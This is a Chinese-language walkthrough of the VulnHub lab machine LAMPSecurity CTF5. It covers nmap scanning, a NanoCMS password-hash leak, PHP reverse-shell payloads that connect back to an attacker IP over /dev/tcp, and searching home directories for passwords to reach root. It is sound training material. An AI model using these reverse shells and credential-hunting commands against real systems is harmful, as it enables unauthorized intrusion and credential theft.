vulnhub - LAMPSECURITY: CTF5

Mar10發表於2024-06-15
LAMP

vulnhub - LAMPSECURITY: CTF5

資訊收集

埠掃描

nmap -sT --min-rate 10000 -p- 192.168.157.164

image-20240614164002842

詳細掃描

sudo nmap -sT -sC -sV -O -p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

image-20240614164538787

漏洞探測

sudo nmap --script=vuln p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

給出來很多資訊,一會可以都嘗試嘗試

image-20240614211412967

web滲透

先翻一翻網頁

image-20240614205802829

注意到blog頁面提到了NanoCMS

image-20240614205845553

搜到了一個RCE,但是需要登入賬戶

image-20240614210612471

搜了一下發現還有一個密碼雜湊資訊洩露漏洞

image-20240614210756392

訪問了一下還真有,洩露了admin的密碼

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

image-20240614211030055

成功獲得密碼shannon

可以登入,但是網頁載入緩慢

image-20240614212237532

這裡不知道什麼緣故我的本地瀏覽器一直登不上,kali內的瀏覽器可以

找到程式碼執行位置反彈shell

<?php system("bash -i > /dev/tcp/192.168.157.161/7777 0>&1");?> 
或
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.157.161/7777 0>&1'"); ?>

image-20240614214848233

儲存後回到blog首頁點選home觸發

image-20240614214918557

這裡也能看出兩種shell的區別

提權

cat /etc/passwd

主要關注以下使用者

patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

搜尋記錄

grep -R -i pass /home/* 2>/dev/null

image-20240615130227773

檢視可疑檔案

bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

50$cent應該就是root的密碼,提升為tty後登入root

python -c "import pty;pty.spawn('/bin/sh')"

image-20240615131328259

相關文章